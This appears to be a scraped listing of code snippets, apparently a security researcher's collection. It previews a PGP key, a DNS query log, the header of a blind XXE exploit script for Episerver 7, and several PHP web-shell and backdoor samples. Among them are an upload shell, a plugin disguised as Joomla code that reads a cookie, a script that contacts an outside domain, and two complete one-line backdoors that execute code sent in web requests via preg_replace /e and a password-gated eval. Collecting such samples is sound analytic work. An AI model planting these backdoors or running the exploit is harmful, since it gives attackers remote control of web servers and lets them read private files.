This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-----BEGIN PGP PUBLIC KEY BLOCK----- | |
mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A | |
WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k | |
j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s | |
gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU | |
3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9 | |
Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE | |
5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG | |
cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Resolver 1 Bahnhof | |
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49) | |
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
## | |
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below | |
## | |
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below! | |
## | |
## Written by Jonas Lejon 2017-12-19 <[email protected]> https://triop.se | |
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573 | |
## | |
## Usage: ./episploit.py <target> [file-to-read] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
error_reporting(0); | |
if (!isset($_SESSION['bajak'])) { | |
$visitcount = 0; | |
$web = $_SERVER["HTTP_HOST"]; | |
$inj = $_SERVER["REQUEST_URI"]; | |
$body = "ada yang inject \n$web$inj"; | |
$safem0de = @ini_get('safe_mode'); | |
if (!$safem0de) {$security= "SAFE_MODE = OFF";} | |
else {$security= "SAFE_MODE = ON";}; | |
$serper=gethostbyname($_SERVER['SERVER_ADDR']); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* @package Joomla.Plugin.System | |
* @since 1.5 | |
* | |
* | |
*/ | |
class PluginJoomla { | |
public function __construct() { | |
$jq = @$_COOKIE['ContentJQ3']; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @error_reporting(0); | |
define('cdomainDosNZ', "ssl-backup24.com"); | |
define('showop_phpDosNZ', "showop_click.php"); | |
define('info_phpDosNZ', 'info.php'); | |
if (array_key_exists('HTTP_TEST', $_SERVER)) { | |
echo (md5("TEST2016_CLICK")); | |
exit; | |
} | |
function fetch_urlDosNZ($url, $data) { | |
$content = ''; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$self = $_SERVER['PHP_SELF']; | |
$docr = $_SERVER['DOCUMENT_ROOT']; | |
$sern = $_SERVER['SERVER_NAME']; | |
$tend = "</tr></form></table><br><br><br><br>"; | |
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} | |
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} | |
else {$ac = "upload";} | |
switch($ac) { | |
case "upload": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], ''); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")% |